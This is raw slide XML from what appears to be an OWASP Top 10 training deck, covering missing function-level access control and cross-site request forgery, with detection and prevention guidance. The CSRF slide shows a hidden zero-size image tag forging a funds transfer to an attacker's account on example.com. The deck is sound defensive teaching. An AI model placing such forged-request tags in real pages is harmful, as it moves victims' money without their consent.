              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page, this is also a flaw, and may lead the attacker to more improperly protected admin pages.</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A page provides an ‘action ‘parameter to specify the function being invoked, and different actions require different roles. If these roles aren’t enforced, that’s a flaw.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Forced Access?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The best way to find out if an application has failed to properly restrict function level access is to verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does the UI show navigation to unauthorized functions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server side authentication or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>checks missing?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are server side checks done that solely rely on information provided by the attacker?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using a proxy, browse your application with a privileged role. Then revisit restricted pages using a less privileged role. If the server responses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are alike, you're probably vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Some testing proxies directly support this type of analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You can also check the access control implementation in the code. Try following a single privileged request through the code and verifying the authorization pattern. Then search the codebase to find where that pattern is not being followed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated tools are unlikely to find these problems.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Failure to Restrict URL Access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50" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1"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Development Guide: Chapter on Authorization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Testing Guide: Testing for Path Traversal</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Article on Forced Browsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional access control requirements, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pP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285 on Improper Access Control (Authorization)</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Forced Access?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Your application should have a consistent and easy to analyze authorization module that is invoked from all of your business functions.  Frequently, such protection is provided by one or more components external to the application code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think about the process for managing entitlements and ensure you can update and audit easily. Don’t hard code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The enforcement mechanism(s) should deny all access by default, requiring explicit grants to specific roles for access to every function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the function is involved in a workflow, check to make sure the conditions are in the proper state to allow access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTE: Most web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don’t display links </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and buttons to unauthorized functions, but this “presentation layer access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doesn’t actually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>provide protection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>checks in the controller or business logic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Missing Function Level Access Control</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A7</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804472047"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="255347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6956">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load content into your users’ browsers, and thus force them to submit a request to your website. Any website or other HTML feed that your users access could do this.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 creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>If the user is authenticated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, the attack succeeds.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200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> takes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> advantage of the fact that most web apps allow attackers to predict all the details of a particular action.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detection of CSRF flaws is fairly easy via penetration testing or code analysis.</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trick victims into performing any state changing operation the victim is authorized to perform,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> e.g., </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>updating account details, making purchases, logout and even login.</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or application functions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Imagine not being sure if users intended to take these actions.</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the impact to your reputation.</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allows a user to submit a state changing request that does not include anything secret. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/transferFunds?amount=1500</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &amp;destinationAccount=4673243243</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/transferFunds?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  amount=1500&amp;destinationAccount=attackersAcct#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  width="0" height="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.</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CSRF?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests.  An alternate defense is to require the user to prove they intended to submit the request, either through reauthentication, or some other proof they are a real user (e.g., a CAPTCHA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You should check multistep transactions, as they are not inherently immune. Attackers can easily forge a series of requests by using multiple tags or possibly JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t provide any defense against CSRF since this information is also included in forged requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CSRF Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool can help generate test cases to demonstrate the dangers of CSRF flaws.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CSRF Article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CSRF Prevention Cheat Sheet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CSRFGuard - CSRF Defense Tool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ESAPI Project Home Page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ESAPI HTTPUtilities Class with AntiCSRF Tokens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OWASP Testing Guide: Chapter on CSRF Testing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CSRFTester - CSRF Testing Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:b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352 on CSRF </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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CSRF?</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CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is more prone to exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
